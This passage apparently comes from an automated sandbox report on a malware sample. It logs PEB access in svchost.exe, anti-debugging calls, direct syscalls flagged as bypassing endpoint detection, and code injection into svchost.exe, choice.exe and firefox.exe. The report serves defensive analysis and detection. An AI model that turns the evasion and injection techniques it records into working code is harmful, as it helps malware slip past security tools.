          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h]2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h]2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h]2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h]2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h]2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h]2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h]2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03627662 mov eax, dword ptr fs:[00000030h]2_2_03627662
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03627662 mov eax, dword ptr fs:[00000030h]2_2_03627662
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03627662 mov eax, dword ptr fs:[00000030h]2_2_03627662
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643660 mov eax, dword ptr fs:[00000030h]2_2_03643660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643660 mov eax, dword ptr fs:[00000030h]2_2_03643660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643660 mov eax, dword ptr fs:[00000030h]2_2_03643660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366666D mov esi, dword ptr fs:[00000030h]2_2_0366666D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366666D mov eax, dword ptr fs:[00000030h]2_2_0366666D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366666D mov eax, dword ptr fs:[00000030h]2_2_0366666D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630670 mov eax, dword ptr fs:[00000030h]2_2_03630670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672670 mov eax, dword ptr fs:[00000030h]2_2_03672670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672670 mov eax, dword ptr fs:[00000030h]2_2_03672670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03633640 mov eax, dword ptr fs:[00000030h]2_2_03633640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F640 mov eax, dword ptr fs:[00000030h]2_2_0364F640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F640 mov eax, dword ptr fs:[00000030h]2_2_0364F640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364F640 mov eax, dword ptr fs:[00000030h]2_2_0364F640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C640 mov eax, dword ptr fs:[00000030h]2_2_0366C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C640 mov eax, dword ptr fs:[00000030h]2_2_0366C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D64A mov eax, dword ptr fs:[00000030h]2_2_0362D64A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D64A mov eax, dword ptr fs:[00000030h]2_2_0362D64A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03665654 mov eax, dword ptr fs:[00000030h]2_2_03665654
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363965A mov eax, dword ptr fs:[00000030h]2_2_0363965A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363965A mov eax, dword ptr fs:[00000030h]2_2_0363965A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366265C mov eax, dword ptr fs:[00000030h]2_2_0366265C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366265C mov ecx, dword ptr fs:[00000030h]2_2_0366265C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366265C mov eax, dword ptr fs:[00000030h]2_2_0366265C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03637623 mov eax, dword ptr fs:[00000030h]2_2_03637623
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD62C mov ecx, dword ptr fs:[00000030h]2_2_036DD62C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD62C mov ecx, dword ptr fs:[00000030h]2_2_036DD62C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD62C mov eax, dword ptr fs:[00000030h]2_2_036DD62C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03635622 mov eax, dword ptr fs:[00000030h]2_2_03635622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03635622 mov eax, dword ptr fs:[00000030h]2_2_03635622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C620 mov eax, dword ptr fs:[00000030h]2_2_0366C620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630630 mov eax, dword ptr fs:[00000030h]2_2_03630630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660630 mov eax, dword ptr fs:[00000030h]2_2_03660630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8633 mov esi, dword ptr fs:[00000030h]2_2_036B8633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8633 mov eax, dword ptr fs:[00000030h]2_2_036B8633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8633 mov eax, dword ptr fs:[00000030h]2_2_036B8633
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366F63F mov eax, dword ptr fs:[00000030h]2_2_0366F63F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366F63F mov eax, dword ptr fs:[00000030h]2_2_0366F63F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h]2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h]2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h]2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h]2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h]2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C3608 mov eax, dword ptr fs:[00000030h]2_2_036C3608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365D600 mov eax, dword ptr fs:[00000030h]2_2_0365D600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365D600 mov eax, dword ptr fs:[00000030h]2_2_0365D600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF607 mov eax, dword ptr fs:[00000030h]2_2_036EF607
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366360F mov eax, dword ptr fs:[00000030h]2_2_0366360F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704600 mov eax, dword ptr fs:[00000030h]2_2_03704600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036296E0 mov eax, dword ptr fs:[00000030h]2_2_036296E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036296E0 mov eax, dword ptr fs:[00000030h]2_2_036296E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C6E0 mov eax, dword ptr fs:[00000030h]2_2_0363C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036356E0 mov eax, dword ptr fs:[00000030h]2_2_036356E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036356E0 mov eax, dword ptr fs:[00000030h]2_2_036356E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036356E0 mov eax, dword ptr fs:[00000030h]2_2_036356E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036566E0 mov eax, dword ptr fs:[00000030h]2_2_036566E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036566E0 mov eax, dword ptr fs:[00000030h]2_2_036566E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC6F2 mov eax, dword ptr fs:[00000030h]2_2_036AC6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC6F2 mov eax, dword ptr fs:[00000030h]2_2_036AC6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036306CF mov eax, dword ptr fs:[00000030h]2_2_036306CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA6C0 mov eax, dword ptr fs:[00000030h]2_2_036FA6C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D86C2 mov eax, dword ptr fs:[00000030h]2_2_036D86C2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365D6D0 mov eax, dword ptr fs:[00000030h]2_2_0365D6D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F86A8 mov eax, dword ptr fs:[00000030h]2_2_036F86A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F86A8 mov eax, dword ptr fs:[00000030h]2_2_036F86A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF68C mov eax, dword ptr fs:[00000030h]2_2_036EF68C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640680 mov eax, dword ptr fs:[00000030h]2_2_03640680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638690 mov eax, dword ptr fs:[00000030h]2_2_03638690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC691 mov eax, dword ptr fs:[00000030h]2_2_036BC691
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C560 mov eax, dword ptr fs:[00000030h]2_2_0364C560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E547 mov eax, dword ptr fs:[00000030h]2_2_0364E547
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666540 mov eax, dword ptr fs:[00000030h]2_2_03666540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668540 mov eax, dword ptr fs:[00000030h]2_2_03668540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B55F mov eax, dword ptr fs:[00000030h]2_2_0370B55F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B55F mov eax, dword ptr fs:[00000030h]2_2_0370B55F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363254C mov eax, dword ptr fs:[00000030h]2_2_0363254C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA553 mov eax, dword ptr fs:[00000030h]2_2_036FA553
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03661527 mov eax, dword ptr fs:[00000030h]2_2_03661527
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366F523 mov eax, dword ptr fs:[00000030h]2_2_0366F523
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364252B mov eax, dword ptr fs:[00000030h]2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364252B mov eax, dword ptr fs:[00000030h]2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364252B mov eax, dword ptr fs:[00000030h]2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364252B mov eax, dword ptr fs:[00000030h]2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364252B mov eax, dword ptr fs:[00000030h]2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364252B mov eax, dword ptr fs:[00000030h]2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364252B mov eax, dword ptr fs:[00000030h]2_2_0364252B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03633536 mov eax, dword ptr fs:[00000030h]2_2_03633536
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03633536 mov eax, dword ptr fs:[00000030h]2_2_03633536
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362753F mov eax, dword ptr fs:[00000030h]2_2_0362753F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362753F mov eax, dword ptr fs:[00000030h]2_2_0362753F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362753F mov eax, dword ptr fs:[00000030h]2_2_0362753F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672539 mov eax, dword ptr fs:[00000030h]2_2_03672539
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B502 mov eax, dword ptr fs:[00000030h]2_2_0362B502
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E507 mov eax, dword ptr fs:[00000030h]2_2_0365E507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632500 mov eax, dword ptr fs:[00000030h]2_2_03632500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C50D mov eax, dword ptr fs:[00000030h]2_2_0366C50D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C50D mov eax, dword ptr fs:[00000030h]2_2_0366C50D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03651514 mov eax, dword ptr fs:[00000030h]2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03651514 mov eax, dword ptr fs:[00000030h]2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03651514 mov eax, dword ptr fs:[00000030h]2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03651514 mov eax, dword ptr fs:[00000030h]2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03651514 mov eax, dword ptr fs:[00000030h]2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03651514 mov eax, dword ptr fs:[00000030h]2_2_03651514
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC51D mov eax, dword ptr fs:[00000030h]2_2_036BC51D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov ecx, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov ecx, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF51B mov eax, dword ptr fs:[00000030h]2_2_036DF51B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5E7 mov ebx, dword ptr fs:[00000030h]2_2_0366A5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5E7 mov eax, dword ptr fs:[00000030h]2_2_0366A5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h]2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h]2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h]2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h]2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h]2_2_0363B5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363B5E0 mov eax, dword ptr fs:[00000030h]2_2_0363B5E0
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_004238DA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,0_2_004238DA
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtSetInformationThread: Direct from: 0x775E2A6CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtQueryAttributesFile: Direct from: 0x775E2D8CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtClose: Direct from: 0x775E2A8C
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtCreateKey: Direct from: 0x775E2B8CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtWriteVirtualMemory: Direct from: 0x775E482CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtProtectVirtualMemory: Direct from: 0x775E2EBCJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtAllocateVirtualMemory: Direct from: 0x775E480CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtOpenKeyEx: Direct from: 0x775E2ABCJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtQueryInformationProcess: Direct from: 0x775E2B46Jump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtResumeThread: Direct from: 0x775E2EDCJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtCreateUserProcess: Direct from: 0x775E363CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtOpenFile: Direct from: 0x775E2CECJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtCreateFile: Direct from: 0x775E2F0CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtQuerySystemInformation: Direct from: 0x775E47ECJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtQueryVolumeInformationFile: Direct from: 0x775E2E4CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtDeviceIoControlFile: Direct from: 0x775E2A0CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtAllocateVirtualMemory: Direct from: 0x775E2B0CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtOpenSection: Direct from: 0x775E2D2CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtSetInformationProcess: Direct from: 0x775E2B7CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtNotifyChangeKey: Direct from: 0x775E3B4CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtReadVirtualMemory: Direct from: 0x775E2DACJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtProtectVirtualMemory: Direct from: 0x775D7A4EJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtSetInformationThread: Direct from: 0x775D6319Jump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtAllocateVirtualMemory: Direct from: 0x775E3BBCJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtQueryInformationToken: Direct from: 0x775E2BCCJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtDelayExecution: Direct from: 0x775E2CFCJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtReadFile: Direct from: 0x775E29FCJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtQuerySystemInformation: Direct from: 0x775E2D1CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtWriteVirtualMemory: Direct from: 0x775E2D5CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtMapViewOfSection: Direct from: 0x775E2C3CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtAllocateVirtualMemory: Direct from: 0x775E2B1CJump to behavior
          Source: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exeNtResumeThread: Direct from: 0x775E35CCJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\8EhMjL3yNF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\choice.exeThread register set: target process: 7044Jump to behavior
          Queues an APC in another process (thread injection)
